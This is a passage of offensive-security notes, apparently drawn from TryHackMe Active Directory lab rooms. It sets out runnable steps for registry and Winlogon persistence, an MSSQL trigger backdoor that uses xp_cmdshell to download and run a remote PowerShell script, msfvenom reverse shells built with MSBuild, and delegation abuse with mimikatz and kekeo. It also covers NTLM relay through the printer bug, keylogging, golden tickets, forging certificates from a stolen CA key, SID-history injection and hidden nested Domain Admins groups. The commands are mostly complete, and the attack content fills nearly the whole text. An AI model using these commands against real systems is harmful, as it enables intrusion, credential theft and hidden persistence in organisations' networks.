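# Tasks\{Id} key next to Tree (Actions, Author, URI) to see what it runs
Find-HiddenScheduledTask |
    Where-Object { -not $_.HasSD -or -not $_.Listed } |
    Format-Table -AutoSize
```

On a clean machine the filtered output is empty; a task that is present in Tree, lacks SD and is absent from Get-ScheduledTask is exactly the artefact the hiding step above leaves behind.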

Execute on user logon

Add a REG_EXPAND_SZ value under one of these keys with the path to your executable as data (HKCU fires for that user only, HKLM for every user; RunOnce entries are removed after they run)

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

OR append your executable, comma-separated, to the Userinit or Shell value under

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\

OR add a new value "UserInitMprLogonScript" containing the command under

HKCU\Environment

MSSQL

On MSSQL session execute queries:

sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO

sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO

After that, let every login impersonate sa, so any low-privileged database login can run xp_cmdshell with sa rights:

USE master

GRANT IMPERSONATE ON LOGIN::sa to [Public];

Configure trigger

USE HRDB
CREATE TRIGGER [sql_backdoor]
ON HRDB.dbo.Employees 
FOR INSERT AS

EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://10.10.117.195:8000/evilscript.ps1'')"';

After all that, insert record to database and shell will execute!

Powershell disabled

Use https://github.com/Mr-Un1k0d3r/PowerLessShell.git

Generate payload

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=IP LPORT=4443 -f psh-reflection > liv0ff.ps1

Metasploit 1 liner for listener

msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_winhttps; set lhost ip;set lport 4443;exploit"

Generate final payload

python2 PowerLessShell.py -type powershell -source /tmp/liv0ff.ps1 -output liv0ff.csproj

Use Msbuild to build payload

MSBuild.exe liv0ff.csproj

Exploiting AD

Constrained delegation

Find accounts allowed to delegate (msDS-AllowedToDelegateTo set), using PowerView

Get-NetUser -TrustedToAuth

Get the password/hash of the account that can delegate (here a service account whose secret is stored in LSA)

mimikatz.exe
token::elevate
lsadump::secrets

Use kekeo to request a TGT as that account, then S4U tickets impersonating the target user for each SPN the delegation allows (http and wsman here, both needed for PSRemoting)

kekeo.exe
tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:ADD_PASSWORD_HERE
tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc

tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc

Back in mimikatz, inject the tickets (pass-the-ticket)

kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
exit 
klist (optional)

Enter into a new session with the ticket we just generated

Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc

Automatic relays (Printer bug)

We need:

  • A valid set of AD account credentials.
  • Network connectivity to the target’s SMB service.
  • The target host must be running the Print Spooler service.
  • The hosts must not have SMB signing enforced.

Find computer accounts that are local admin on other computers through group membership (BloodHound Cypher query); those are the relay targets

MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p

Check for Print Spooler

Get-PrinterPort -ComputerName thmserver2.za.tryhackme.loc
## OR 
GWMI Win32_Printer -Computer thmserver2.za.tryhackme.loc

Check for SMB signing

nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc

Exploit: start the relay against a host where the coerced machine account is admin, trigger the spooler on the victim, and once the SAM dump works rerun with -c to execute a command instead

python3.9 /opt/impacket/examples/ntlmrelayx.py -smb2support -t smb://"OWNED-TARGET-IP" -debug
SpoolSample.exe TARGET-DOMAIN-NAME "Attacker IP"
python3.9 ntlmrelayx.py -smb2support -t smb://"OWNED-TARGET-IP" -c 'whoami /all' -debug

Exploit users (keylogger)

Note: sometimes it’s good idea to move to less privileged users instead of sticking to admin

Also, we’ll be using metasploit modules for this

Find processes that user is running

ps | grep "explorer"

Migrate to process

migrate <PID>

Start keylogger

keyscan_start

Exploit GPO

Check access via Bloodhound, you can use mmc tool via RDP to access and edit GPOs

https://tryhackme.com/room/exploitingad

Inter-Realm TGTs

DOMAIN ADMIN IN THE CHILD DOMAIN REQUIRED (for DCSync)

We need:

  • The KRBTGT password hash
  • The FQDN of the domain
  • The username of the account we want to impersonate
  • The Security Identifier (SID) of the domain

KRBTGT password hash

mimikatz.exe
lsadump::dcsync /user:DOMAIN\krbtgt

FQDN = fully qualified domain name

Username we can decide, domain/enterprise admin preferred

SID of the domain

Any domain principal's SID minus its RID is the domain SID; the /sids value below is the root domain's Enterprise Admins group (RID 519), which is what makes the forged ticket honoured across the trust
Get-ADComputer -Identity "THMDC"
Get-ADGroup -Identity "Enterprise Admins" -Server thmrootdc.tryhackme.loc

Request ticket

kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-632209373-519 /ptt

Persistence

Certificates (don't do this on a real engagement: the only remediation is rotating the CA certificate)

We export the CA's certificate and private key and use it to forge certificates for any user, which we then turn into TGTs

Check certificates (on the CA; the Issuer should be the current domain's CA)

mimikatz.exe
crypto::certificates /systemstore:local_machine

Make the private keys exportable by patching CAPI/CNG

mimikatz.exe
privilege::debug
crypto::capi
crypto::cng

Export (writes .pfx files protected with the password mimikatz)

mimikatz.exe
crypto::certificates /systemstore:local_machine /export

Generate our own certificate signed with the CA's private key

ForgeCert.exe --CaCertPath ./cert.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@za.tryhackme.loc --NewCertPath fullAdmin.pfx --NewCertPassword Password123

Use it to request a TGT

Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:fullAdmin.pfx /password:Password123 /outfile:administrator.kirbi /domain:za.tryhackme.loc /dc:10.200.61.101

Authenticate (in mimikatz)

kerberos::ptt administrator.kirbi

SID History

SIDHistory is meant for migrations; injecting the Domain Admins SID into a low-privileged user's SIDHistory gives that user DA rights on every access check. Needs the DSInternals module on the DC and a stop of the NTDS service, which is noisy

Check SID history of user

Get-ADUser phillip.wilkins -properties sidhistory,memberof

Get SID of the Domain Admins

Get-ADGroup "Domain Admins"

Patch history

Stop-Service -Name ntds -force 
Add-ADDBSidHistory -SamAccountName 'phillip.wilkins' -SidHistory 'S-1-5-21-3885271727-2693558621-2658995185-512' -DatabasePath C:\Windows\NTDS\ntds.dit 
Start-Service -Name ntds

Group Memberships

Create nested AD groups: Domain Admins only shows the outer group as a direct member, so the user's membership is hidden one level down

New-ADGroup -Path "OU=IT,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Nest Group 1" -SamAccountName "<username>_nestgroup1" -DisplayName "<username> Nest Group 1" -GroupScope Global -GroupCategory Security
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Nest Group 2" -SamAccountName "<username>_nestgroup2" -DisplayName "<username> Nest Group 2" -GroupScope Global -GroupCategory Security 

Nest the first group in the second and add the second to Domain Admins

Add-ADGroupMember -Identity "<username>_nestgroup2" -Members "<username>_nestgroup1"
Add-ADGroupMember -Identity "Domain Admins" -Members "<username>_nestgroup2"

Add the user to the first group

Add-ADGroupMember -Identity "<username>_nestgroup1" -Members "<low privileged username>"

Check that it worked (without -Recursive only the outer group is listed):

Get-ADGroupMember -Identity "Domain Admins" -Recursive